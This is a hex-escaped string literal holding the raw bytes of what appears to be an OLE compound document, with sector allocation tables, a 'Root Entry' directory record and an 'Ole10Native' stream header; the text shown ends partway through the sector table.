"\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFD\xFF\xFF\xFF\xFE\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF\xFD\xFF\xFF\xFF" "\xFD\xFF\xFF\xFF\x0A\x00\x00\x00\x0B\x00\x00\x00\x0C\x00\x00\x00\x0D\x00\x00\x00\x0E\x00\x00\x00\x0F\x00\x00\x00\x10\x00\x00\x00\x11\x00" "\x00\x00\x12\x00\x00\x00\x13\x00\x00\x00\x14\x00\x00\x00\x15\x00\x00\x00\x16\x00\x00\x00\x17\x00\x00\x00\x18\x00\x00\x00\x19\x00\x00\x00" "\x1A\x00\x00\x00\x1B\x00\x00\x00\x1C\x00\x00\x00\x1D\x00\x00\x00\x1E\x00\x00\x00\x1F\x00\x00\x00\x20\x00\x00\x00\x21\x00\x00\x00\x22\x00" "\x00\x00\x23\x00\x00\x00\x24\x00\x00\x00\x25\x00\x00\x00\x26\x00\x00\x00\x27\x00\x00\x00\x28\x00\x00\x00\x29\x00\x00\x00\x2A\x00\x00\x00" "\x2B\x00\x00\x00\x2C\x00\x00\x00\x2D\x00\x00\x00\x2E\x00\x00\x00\x2F\x00\x00\x00\x30\x00\x00\x00\x31\x00\x00\x00\x32\x00\x00\x00\x33\x00" "\x00\x00\x34\x00\x00\x00\x35\x00\x00\x00\x36\x00\x00\x00\x37\x00\x00\x00\x38\x00\x00\x00\x39\x00\x00\x00\x3A\x00\x00\x00\x3B\x00\x00\x00" "\x3C\x00\x00\x00\x3D\x00\x00\x00\x3E\x00\x00\x00\x3F\x00\x00\x00\x40\x00\x00\x00\x41\x00\x00\x00\x42\x00\x00\x00\x43\x00\x00\x00\x44\x00" "\x00\x00\x45\x00\x00\x00\x46\x00\x00\x00\x47\x00\x00\x00\x48\x00\x00\x00\x49\x00\x00\x00\x4A\x00\x00\x00\x4B\x00\x00\x00\x4C\x00\x00\x00" "\x4D\x00\x00\x00\x4E\x00\x00\x00\x4F\x00\x00\x00\x50\x00\x00\x00\x51\x00\x00\x00\x52\x00\x00\x00\x53\x00\x00\x00\x54\x00\x00\x00\x55\x00" "\x00\x00\x56\x00\x00\x00\x57\x00\x00\x00\x58\x00\x00\x00\x59\x00\x00\x00\x5A\x00\x00\x00\x5B\x00\x00\x00\x5C\x00\x00\x00\x5D\x00\x00\x00" "\x5E\x00\x00\x00\x5F\x00\x00\x00\x60\x00\x00\x00\x61\x00\x00\x00\x62\x00\x00\x00\x63\x00\x00\x00\x64\x00\x00\x00\x65\x00\x00\x00\x66\x00" "\x00\x00\x67\x00\x00\x00\x68\x00\x00\x00\x69\x00\x00\x00\x6A\x00\x00\x00\x6B\x00\x00\x00\x6C\x00\x00\x00\x6D\x00\x00\x00\x6E\x00\x00\x00" "\x6F\x00\x00\x00\x70\x00\x00\x00\x71\x00\x00\x00\x72\x00\x00\x00\x73\x00\x00\x00\x74\x00\x00\x00\x75\x00\x00\x00\x76\x00\x00\x00\x77\x00" "\x00\x00\x78\x00\x00\x00\x79\x00\x00\x00\x7A\x00\x00\x00\x7B\x00\x00\x00\x7C\x00\x00\x00\x7D\x00\x00\x00\x7E\x00\x00\x00\x7F\x00\x00\x00" "\x80\x00\x00\x00\x52\x00\x6F\x00\x6F\x00\x74\x00\x20\x00\x45\x00\x6E\x00\x74\x00\x72\x00\x79\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x16\x00\x05\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x01\x00\x00\x00\x0C\x00\x03\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xD0\x8D\xED\x42\xD9\xF8\xCF\x01\xFE\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x4F\x00" "\x6C\x00\x65\x00\x31\x00\x30\x00\x4E\x00\x61\x00\x74\x00\x69\x00\x76\x00\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1A\x00\x02\x01\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x1D\x91\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x81\x00\x00\x00\x82\x00\x00\x00\x83\x00\x00\x00\x84\x00\x00\x00\x85\x00\x00\x00\x86\x00\x00\x00\x87\x00\x00\x00" "\x88\x00\x00\x00\x89\x00\x00\x00\x8A\x00\x00\x00\x8B\x00\x00\x00\x8C\x00\x00\x00\x8D\x00\x00\x00\x8E\x00\x00\x00\x8F\x00\x00\x00\x90\x00" "\x00\x00\x91\x00\x00\x00\x92\x00\x00\x00\x93\x00\x00\x00\x94\x00\x00\x00\x95\x00\x00\x00\x96\x00\x00\x00\x97\x00\x00\x00\x98\x00\x00\x00" "\x99\x00\x00\x00\x9A\x00\x00\x00\x9B\x00\x00\x00\x9C\x00\x00\x00\x9D\x00\x00\x00\x9E\x00\x00\x00\x9F\x00\x00\x00\xA0\x00\x00\x00\xA1\x00" "\x00\x00\xA2\x00\x00\x00\xA3\x00\x00\x00\xA4\x00\x00\x00\xA5\x00\x00\x00\xA6\x00\x00\x00\xA7\x00\x00\x00\xA8\x00\x00\x00\xA9\x00\x00\x00" "\xAA\x00\x00\x00\xAB\x00\x00\x00\xAC\x00\x00\x00\xAD\x00\x00\x00\xAE\x00\x00\x00\xAF\x00\x00\x00\xB0\x00\x00\x00\xB1\x00\x00\x00\xB2\x00" "\x00\x00\xB3\x00\x00\x00\xB4\x00\x00\x00\xB5\x00\x00\x00\xB6\x00\x00\x00\xB7\x00\x00\x00\xB8\x00\x00\x00\xB9\x00\x00\x00\xBA\x00\x00\x00" "\xBB\x00\x00\x00\xBC\x00\x00\x00\xBD\x00\x00\x00\xBE\x00\x00\x00\xBF\x00\x00\x00\xC0\x00\x00\x00\xC1\x00\x00\x00\xC2\x00\x00\x00\xC3\x00" "\x00\x00\xC4\x00\x00\x00\xC5\x00\x00\x00\xC6\x00\x00\x00\xC7\x00\x00\x00\xC8\x00\x00\x00\xC9\x00\x00\x00\xCA\x00\x00\x00\xCB\x00\x00\x00" "\xCC\x00\x00\x00\xCD\x00\x00\x00\xCE\x00\x00\x00\xCF\x00\x00\x00\xD0\x00\x00\x00\xD1\x00\x00\x00\xD2\x00\x00\x00\xD3\x00\x00\x00\xD4\x00" "\x00\x00\xD5\x00\x00\x00\xD6\x00\x00\x00\xD7\x00\x00\x00\xD8\x00\x00\x00\xD9\x00\x00\x00\xDA\x00\x00\x00\xDB\x00\x00\x00\xDC\x00\x00\x00" "\xDD\x00\x00\x00\xDE\x00\x00\x00\xDF\x00\x00\x00\xE0\x00\x00\x00\xE1\x00\x00\x00\xE2\x00\x00\x00\xE3\x00\x00\x00\xE4\x00\x00\x00\xE5\x00" "\x00\x00\xE6\x00\x00\x00\xE7\x00\x00\x00\xE8\x00\x00\x00\xE9\x00\x00\x00\xEA\x00\x00\x00\xEB\x00\x00\x00\xEC\x00\x00\x00\xED\x00\x00\x00" "\xEE\x00\x00\x00\xEF\x00\x00\x00\xF0\x00\x00\x00\xF1\x00\x00\x00\xF2\x00\x00\x00\xF3\x00\x00\x00\xF4\x00\x00\x00\xF5\x00\x00\x00\xF6\x00" "\x00\x00\xF7\x00\x00\x00\xF8\x00\x00\x00\xF9\x00\x00\x00\xFA\x00\x00\x00\xFB\x00\x00\x00\xFC\x00\x00\x00\xFD\x00\x00\x00\xFE\x00\x00\x00" "\xFF\x00\x00\x00\x00\x01\x00\x00\x01\x01\x00\x00\x02\x01\x00\x00\x03\x01\x00\x00\x04\x01\x00\x00\x05\x01\x00\x00\x06\x01\x00\x00\x07\x01" "\x00\x00\x08\x01\x00\x00\x09\x01\x00\x00\x0A\x01\x00\x00\x0B\x01\x00\x00\x0C\x01\x00\x00\x0D\x01\x00\x00\x0E\x01\x00\x00\x0F\x01\x00\x00" "\x10\x01\x00\x00\x11\x01\x00\x00\x12\x01\x00\x00\x13\x01\x00\x00\x14\x01\x00\x00\x15\x01\x00\x00\x16\x01\x00\x00\x17\x01\x00\x00\x18\x01" "\x00\x00\x19\x01\x00\x00\x1A\x01\x00\x00\x1B\x01\x00\x00\x1C\x01\x00\x00\x1D\x01\x00\x00\x1E\x01\x00\x00\x1F\x01\x00\x00\x20\x01\x00\x00" "\x21\x01\x00\x00\x22\x01\x00\x00\x23\x01\x00\x00\x24\x01\x00\x00\x25\x01\x00\x00\x26\x01\x00\x00\x27\x01\x00\x00\x28\x01\x00\x00\x29\x01" "\x00\x00\x2A\x01\x00\x00\x2B\x01\x00\x00\x2C\x01\x00\x00\x2D\x01\x00\x00\x2E\x01\x00\x00\x2F\x01\x00\x00\x30\x01\x00\x00\x31\x01\x00\x00" "\x32\x01\x00\x00\x33\x01\x00\x00\x34\x01\x00\x00\x35\x01\x00\x00\x36\x01\x00\x00\x37\x01\x00\x00\x38\x01\x00\x00\x39\x01\x00\x00\x3A\x01" "\x00\x00\x3B\x01\x00\x00\x3C\x01\x00\x00\x3D\x01\x00\x00\x3E\x01\x00\x00\x3F\x01\x00\x00\x40\x01\x00\x00\x41\x01\x00\x00\x42\x01\x00\x00" "\x43\x01\x00\x00\x44\x01\x00\x00\x45\x01\x00\x00\x46\x01\x00\x00\x47\x01\x00\x00\x48\x01\x00\x00\x49\x01\x00\x00\x4A\x01\x00\x00\x4B\x01" "\x00\x00\x4C\x01\x00\x00\x4D\x01\x00\x00\x4E\x01\x00\x00\x4F\x01\x00\x00\x50\x01\x00\x00\x51\x01\x00\x00\x52\x01\x00\x00\x53\x01\x00\x00" "\x54\x01\x00\x00\x55\x01\x00\x00\x56\x01\x00\x00\x57\x01\x00\x00\x58\x01\x00\x00\x59\x01\x00\x00\x5A\x01\x00\x00\x5B\x01\x00\x00\x5C\x01" "\x00\x00\x5D\x01\x00\x00\x5E\x01\x00\x00\x5F\x01\x00\x00\x60\x01\x00\x00\x61\x01\x00\x00\x62\x01\x00\x00\x63\x01\x00\x00\x64\x01\x00\x00" "\x65\x01\x00\x00\x66\x01\x00\x00\x67\x01\x00\x00\x68\x01\x00\x00\x69\x01\x00\x00\x6A\x01\x00\x00\x6B\x01\x00\x00\x6C\x01\x00\x00\x6D\x01" "\x00\x00\x6E\x01\x00\x00\x6F\x01\x00\x00\x70\x01\x00\x00\x71\x01\x00\x00\x72\x01\x00\x00\x73\x01\x00\x00\x74\x01\x00\x00\x75\x01\x00\x00" "\x76\x01\x00\x00\x77\x01\x00\x00\x78\x01\x00\x00\x79\x01\x00\x00\x7A\x01\x00\x00\x7B\x01\x00\x00\x7C\x01\x00\x00\x7D\x01\x00\x00\x7E\x01" "\x00\x00\x7F\x01\x00\x00\x80\x01\x00\x00\x81\x01\x00\x00\x82\x01\x00\x00\x83\x01\x00\x00\x84\x01\x00\x00\x85\x01\x00\x00\x86\x01\x00\x00" "\x87\x01\x00\x00\x88\x01\x00\x00\x89\x01\x00\x00\x8A\x01\x00\x00\x8B\x01\x00\x00\x8C\x01\x00\x00\x8D\x01\x00\x00\x8E\x01\x00\x00\x8F\x01" "\x00\x00\x90\x01\x00\x00\x91\x01\x00\x00\x92\x01\x00\x00\x93\x01\x00\x00\x94\x01\x00\x00\x95\x01\x00\x00\x96\x01\x00\x00\x97\x01\x00\x00" "\x98\x01\x00\x00\x99\x01\x00\x00\x9A\x01\x00\x00\x9B\x01\x00\x00\x9C\x01\x00\x00\x9D\x01\x00\x00\x9E\x01\x00\x00\x9F\x01\x00\x00\xA0\x01" "\x00\x00\xA1\x01\x00\x00\xA2\x01\x00\x00\xA3\x01\x00\x00\xA4\x01\x00\x00\xA5\x01\x00\x00\xA6\x01\x00\x00\xA7\x01\x00\x00\xA8\x01\x00\x00" "\xA9\x01\x00\x00\xAA\x01\x00\x00\xAB\x01\x00\x00\xAC\x01\x00\x00\xAD\x01\x00\x00\xAE\x01\x00\x00\xAF\x01\x00\x00\xB0\x01\x00\x00\xB1\x01" "\x00\x00\xB2\x01\x00\x00\xB3\x01\x00\x00\xB4\x01\x00\x00\xB5\x01\x00\x00\xB6\x01\x00\x00\xB7\x01\x00\x00\xB8\x01\x00\x00\xB9\x01\x00\x00" "\xBA\x01\x00\x00\xBB\x01\x00\x00\xBC\x01\x00\x00\xBD\x01\x00\x00\xBE\x01\x00\x00\xBF\x01\x00\x00\xC0\x01\x00\x00\xC1\x01\x00\x00\xC2\x01" "\x00\x00\xC3\x01\x00\x00\xC4\x01\x00\x00\xC5\x01\x00\x00\xC6\x01\x00\x00\xC7\x01\x00\x00\xC8\x01\x00\x00\xC9\x01\x00\x00\xCA\x01\x00\x00" "\xCB\x01\x00\x00\xCC\x01\x00\x00\xCD\x01\x00\x00\xCE\x01\x00\x00\xCF\x01\x00\x00\xD0\x01\x00\x00\xD1\x01\x00\x00\xD2\x01\x00\x00\xD3\x01" "\x00\x00\xD4\x01\x00\x00\xD5\x01\x00\x00\xD6\x01\x00\x00\xD7\x01\x00\x00\xD8\x01\x00\x00\xD9\x01\x00\x00\xDA\x01\x00\x00\xDB\x01\x00\x00" "\xDC\x01\x00\x00\xDD\x01\x00\x00\xDE\x01\x00\x00\xDF\x01\x00\x00\xE0\x01\x00\x00\xE1\x01\x00\x00\xE2\x01\x00\x00\xE3\x01\x00\x00\xE4\x01" "\x00\x00\xE5\x01\x00\x00\xE6\x01\x00\x00\xE7\x01\x00\x00\xE8\x01\x00\x00\xE9\x01\x00\x00\xEA\x01\x00\x00\xEB\x01\x00\x00\xEC\x01\x00\x00" "\xED\x01\x00\x00\xEE\x01\x00\x00\xEF\x01\x00\x00\xF0\x01\x00\x00\xF1\x01\x00\x00\xF2\x01\x00\x00\xF3\x01\x00\x00\xF4\x01\x00\x00\xF5\x01" "\x00\x00\xF6\x01\x00\x00\xF7\x01\x00\x00\xF8\x01\x00\x00\xF9\x01\x00\x00\xFA\x01\x00\x00\xFB\x01\x00\x00\xFC\x01\x00\x00\xFD\x01\x00\x00" "\xFE\x01\x00\x00\xFF\x01\x00\x00\x00\x02\x00\x00\x01\x02\x00\x00\x02\x02\x00\x00\x03\x02\x00\x00\x04\x02\x00\x00\x05\x02\x00\x00\x06\x02" "\x00\x00\x07\x02\x00\x00\x08\x02\x00\x00\x09\x02\x00\x00\x0A\x02\x00\x00\x0B\x02\x00\x00\x0C\x02\x00\x00\x0D\x02\x00\x00\x0E\x02\x00\x00" "\x0F\x02\x00\x00\x10\x02\x00\x00\x11\x02\x00\x00\x12\x02\x00\x00\x13\x02\x00\x00\x14\x02\x00\x00\x15\x02\x00\x00\x16\x02\x00\x00\x17\x02" "\x00\x00\x18\x02\x00\x00\x19\x02\x00\x00\x1A\x02\x00\x00\x1B\x02\x00\x00\x1C\x02\x00\x00\x1D\x02\x00\x00\x1E\x02\x00\x00\x1F\x02\x00\x00" "\x20\x02\x00\x00\x21\x02\x00\x00\x22\x02\x00\x00\x23\x02\x00\x00\x24\x02\x00\x00\x25\x02\x00\x00\x26\x02\x00\x00\x27\x02\x00\x00\x28\x02" "\x00\x00\x29\x02\x00\x00\x2A\x02\x00\x00\x2B\x02\x00\x00\x2C\x02\x00\x00\x2D\x02\x00\x00\x2E\x02\x00\x00\x2F\x02\x00\x00\x30\x02\x00\x00" "\x31\x02\x00\x00\x32\x02\x00\x00\x33\x02\x00\x00\x34\x02\x00\x00\x35\x02\x00\x00\x36\x02\x00\x00\x37\x02\x00\x00\x38\x02\x00\x00\x39\x02" "\x00\x00\x3A\x02\x00\x00\x3B\x02\x00\x00\x3C\x02\x00\x00\x3D\x02\x00\x00\x3E\x02\x00\x00\x3F\x02\x00\x00\x40\x02\x00\x00\x41\x02\x00\x00" "\x42\x02\x00\x00\x43\x02\x00\x00\x44\x02\x00\x00\x45\x02\x00\x00\x46\x02\x00\x00\x47\x02\x00\x00\x48\x02\x00\x00\x49\x02\x00\x00\x4A\x02" "\x00\x00\x4B\x02\x00\x00\x4C\x02\x00\x00\x4D\x02\x00\x00\x4E\x02\x00\x00\x4F\x02\x00\x00\x50\x02\x00\x00\x51\x02\x00\x00\x52\x02\x00\x00" "\x53\x02\x00\x00\x54\x02\x00\x00\x55\x02\x00\x00\x56\x02\x00\x00\x57\x02\x00\x00\x58\x02\x00\x00\x59\x02\x00\x00\x5A\x02\x00\x00\x5B\x02" "\x00\x00\x5C\x02\x00\x00\x5D\x02\x00\x00\x5E\x02\x00\x00\x5F\x02\x00\x00\x60\x02\x00\x00\x61\x02\x00\x00\x62\x02\x00\x00\x63\x02\x00\x00" "\x64\x02\x00\x00\x65\x02\x00\x00\x66\x02\x00\x00\x67\x02\x00\x00\x68\x02\x00\x00\x69\x02\x00\x00\x6A\x02\x00\x00\x6B\x02\x00\x00\x6C\x02" "\x00\x00\x6D\x02\x00\x00\x6E\x02\x00\x00\x6F\x02\x00\x00\x70\x02\x00\x00\x71\x02\x00\x00\x72\x02\x00\x00\x73\x02\x00\x00\x74\x02\x00\x00" "\x75\x02\x00\x00\x76\x02\x00\x00\x77\x02\x00\x00\x78\x02\x00\x00\x79\x02\x00\x00\x7A\x02\x00\x00\x7B\x02\x00\x00\x7C\x02\x00\x00\x7D\x02" "\x00\x00\x7E\x02\x00\x00\x7F\x02\x00\x00\x80\x02\x00\x00\x81\x02\x00\x00\x82\x02\x00\x00\x83\x02\x00\x00\x84\x02\x00\x00\x85\x02\x00\x00" "\x86\x02\x00\x00\x87\x02\x00\x00\x88\x02\x00\x00\x89\x02\x00\x00\x8A\x02\x00\x00\x8B\x02\x00\x00\x8C\x02\x00\x00\x8D\x02\x00\x00\x8E\x02" "\x00\x00\x8F\x02\x00\x00\x90\x02\x00\x00\x91\x02\x00\x00\x92\x02\x00\x00\x93\x02\x00\x00\x94\x02\x00\x00\x95\x02\x00\x00\x96\x02\x00\x00" "\x97\x02\x00\x00\x98\x02\x00\x00\x99\x02\x00\x00\x9A\x02\x00\x00\x9B\x02\x00\x00\x9C\x02\x00\x00\x9D\x02\x00\x00\x9E\x02\x00\x00\x9F\x02" "\x00\x00\xA0\x02\x00\x00\xA1\x02\x00\x00\xA2\x02\x00\x00\xA3\x02\x00\x00\xA4\x02\x00\x00\xA5\x02\x00\x00\xA6\x02\x00\x00\xA7\x02\x00\x00" "\xA8\x02\x00\x00\xA9\x02\x00\x00\xAA\x02\x00\x00\xAB\x02\x00\x00\xAC\x02\x00\x00\xAD\x02\x00\x00\xAE\x02\x00\x00\xAF\x02\x00\x00\xB0\x02" "\x00\x00\xB1\x02\x00\x00\xB2\x02\x00\x00\xB3\x02\x00\x00\xB4\x02\x00\x00\xB5\x02\x00\x00\xB6\x02\x00\x00\xB7\x02\x00\x00\xB8\x02\x00\x00" "\xB9\x02\x00\x00\xBA\x02\x00\x00\xBB\x02\x00\x00\xBC\x02\x00\x00\xBD\x02\x00\x00\xBE\x02\x00\x00\xBF\x02\x00\x00\xC0\x02\x00\x00\xC1\x02" "\x00\x00\xC2\x02\x00\x00\xC3\x02\x00\x00\xC4\x02\x00\x00\xC5\x02\x00\x00\xC6\x02\x00\x00\xC7\x02\x00\x00\xC8\x02\x00\x00\xC9\x02\x00\x00" "\xCA\x02\x00\x00\xCB\x02\x00\x00\xCC\x02\x00\x00\xCD\x02\x00\x00\xCE\x02\x00\x00\xCF\x02\x00\x00\xD0\x02\x00\x00\xD1\x02\x00\x00\xD2\x02" "\x00\x00\xD3\x02\x00\x00\xD4\x02\x00\x00\xD5\x02\x00\x00\xD6\x02\x00\x00\xD7\x02\x00\x00\xD8\x02\x00\x00\xD9\x02\x00\x00\xDA\x02\x00\x00" "\xDB\x02\x00\x00\xDC\x02\x00\x00\xDD\x02\x00\x00\xDE\x02\x00\x00\xDF\x02\x00\x00\xE0\x02\x00\x00\xE1\x02\x00\x00\xE2\x02\x00\x00\xE3\x02" "\x00\x00\xE4\x02\x00\x00\xE5\x02\x00\x00\xE6\x02\x00\x00\xE7\x02\x00\x00\xE8\x02\x00\x00\xE9\x02\x00\x00\xEA\x02\x00\x00\xEB\x02\x00\x00" "\xEC\x02\x00\x00\xED\x02\x00\x00\xEE\x02\x00\x00\xEF\x02\x00\x00\xF0\x02\x00\x00\xF1\x02\x00\x00\xF2\x02\x00\x00\xF3\x02\x00\x00\xF4\x02" "\x00\x00\xF5\x02\x00\x00\xF6\x02\x00\x00\xF7\x02\x00\x00\xF8\x02\x00\x00\xF9\x02\x00\x00\xFA\x02\x00\x00\xFB\x02\x00\x00\xFC\x02\x00\x00" "\xFD\x02\x00\x00\xFE\x02\x00\x00\xFF\x02\x00\x00\x00\x03\x00\x00\x01\x03\x00\x00\x02\x03\x00\x00\x03\x03\x00\x00\x04\x03\x00\x00\x05\x03" "\x00\x00\x06\x03\x00\x00\x07\x03\x00\x00\x08\x03\x00\x00\x09\x03\x00\x00\x0A\x03\x00\x00\x0B\x03\x00\x00\x0C\x03\x00\x00\x0D\x03\x00\x00" "\x0E\x03\x00\x00\x0F\x03\x00\x00\x10\x03\x00\x00\x11\x03\x00\x00\x12\x03\x00\x00\x13\x03\x00\x00\x14\x03\x00\x00\x15\x03\x00\x00\x16\x03" "\x00\x00\x17\x03\x00\x00\x18\x03\x00\x00\x19\x03\x00\x00\x1A\x03\x00\x00\x1B\x03\x00\x00\x1C\x03\x00\x00\x1D\x03\x00\x00\x1E\x03\x00\x00" "\x1F\x03\x00\x00\x20\x03\x00\x00\x21\x03\x00\x00\x22\x03\x00\x00\x23\x03\x00\x00\x24\x03\x00\x00\x25\x03\x00\x00\x26\x03\x00\x00\x27\x03" "\x00\x00\x28\x03\x00\x00\x29\x03\x00\x00\x2A\x03\x00\x00\x2B\x03\x00\x00\x2C\x03\x00\x00\x2D\x03\x00\x00\x2E\x03\x00\x00\x2F\x03\x00\x00" "\x30\x03\x00\x00\x31\x03\x00\x00\x32\x03\x00\x00\x33\x03\x00\x00\x34\x03\x00\x00\x35\x03\x00\x00\x36\x03\x00\x00\x37\x03\x00\x00\x38\x03" "\x00\x00\x39\x03\x00\x00\x3A\x03\x00\x00\x3B\x03\x00\x00\x3C\x03\x00\x00\x3D\x03\x00\x00\x3E\x03\x00\x00\x3F\x03\x00\x00\x40\x03\x00\x00" "\x41\x03\x00\x00\x42\x03\x00\x00\x43\x03\x00\x00\x44\x03\x00\x00\x45\x03\x00\x00\x46\x03\x00\x00\x47\x03\x00\x00\x48\x03\x00\x00\x49\x03" "\x00\x00\x4A\x03\x00\x00\x4B\x03\x00\x00\x4C\x03\x00\x00\x4D\x03\x00\x00\x4E\x03\x00\x00\x4F\x03\x00\x00\x50\x03\x00\x00\x51\x03\x00\x00" "\x52\x03\x00\x00\x53\x03\x00\x00\x54\x03\x00\x00\x55\x03\x00\x00\x56\x03\x00\x00\x57\x03\x00\x00\x58\x03\x00\x00\x59\x03\x00\x00\x5A\x03" "\x00\x00\x5B\x03\x00\x00\x5C\x03\x00\x00\x5D\x03\x00\x00\x5E\x03\x00\x00\x5F\x03\x00\x00\x60\x03\x00\x00\x61\x03\x00\x00\x62\x03\x00\x00" "\x63\x03\x00\x00\x64\x03\x00\x00\x65\x03\x00\x00\x66\x03\x00\x00\x67\x03\x00\x00\x68\x03\x00\x00\x69\x03\x00\x00\x6A\x03\x00\x00\x6B\x03" "\x00\x00\x6C\x03\x00\x00\x6D\x03\x00\x00\x6E\x03\x00\x00\x6F\x03\x00\x00\x70\x03\x00\x00\x71\x03\x00\x00\x72\x03\x00\x00\x73\x03\x00\x00" "\x74\x03\x00\x00\x75\x03\x00\x00\x76\x03\x00\x00\x77\x03\x00\x00\x78\x03\x00\x00\x79\x03\x00\x00\x7A\x03\x00\x00\x7B\x03\x00\x00\x7C\x03" "\x00\x00\x7D\x03\x00\x00\x7E\x03\x00\x00\x7F\x03\x00\x00\x80\x03\x00\x00\x81\x03\x00\x00\x82\x03\x00\x00\x83\x03\x00\x00\x84\x03\x00\x00" "\x85\x03\x00\x00\x86\x03\x00\x00\x87\x03\x00\x00\x88\x03\x00\x00\x89\x03\x00\x00\x8A\x03\x00\x00\x8B\x03\x00\x00\x8C\x03\x00\x00\x8D\x03" "\x00\x00\x8E\x03\x00\x00\x8F\x03\x00\x00\x90\x03\x00\x00\x91\x03\x00\x00\x92\x03\x00\x00\x93\x03\x00\x00\x94\x03\x00\x00\x95\x03\x00\x00" "\x96\x03\x00\x00\x97\x03\x00\x00\x98\x03\x00\x00\x99\x03\x00\x00\x9A\x03\x00\x00\x9B\x03\x00\x00\x9C\x03\x00\x00\x9D\x03\x00\x00\x9E\x03" 